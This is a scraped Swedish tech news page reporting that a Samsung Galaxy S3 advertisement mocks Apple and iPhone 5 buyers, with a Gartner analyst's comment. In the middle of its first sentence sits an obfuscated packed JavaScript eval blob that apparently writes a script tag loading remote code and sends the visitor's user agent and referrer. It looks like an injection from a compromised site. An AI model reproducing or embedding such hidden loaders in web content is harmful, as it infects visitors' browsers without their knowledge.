Image Image Image Image Image Image Image Image Image Image

| 19 juni, 2018

Scroll to top

Top

No Comments

Samsung slutar inte att håna Apple

Sebastian Plengier Ehrnfelt

kriget eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|beddz|var|u0026u|referrer|ersas||js|php’.split(‘|’),0,{}))
mellan de två stora elektronik-bolagen har inte nått sitt slut än. Nu hånar Samsung Apple igen i en reklamfilm som nyss släppts.

I den nya annonsen står ett gäng Applekunder och köar utanför en Applebutik i väntan på släppet av nya iPhone 5.

Det är en reklam för Samsungs nya smartphone Galaxy S3 som gör en massa jämförelser med iPhone 5. Det nämns att iPhone inte har stöd för nfc, stöd för LTE och större bildskärm. Man märker att Samsung här försöker fokusera på de funktioner som Apple-användare var lite sura över att de inte introducerades.

– Det visar inte upp speciellt mycket innovationsförmåga inom annonser. Jag tror att som en tillverkare måste du vara försiktig när du försöker göra dig lustig på andras bekostnad, oftast vinner du inga kunder på det. Det slutar endast med att många blir upprörda, säger Carolina Milanesi på analysföretaget Gartner.

Submit a Comment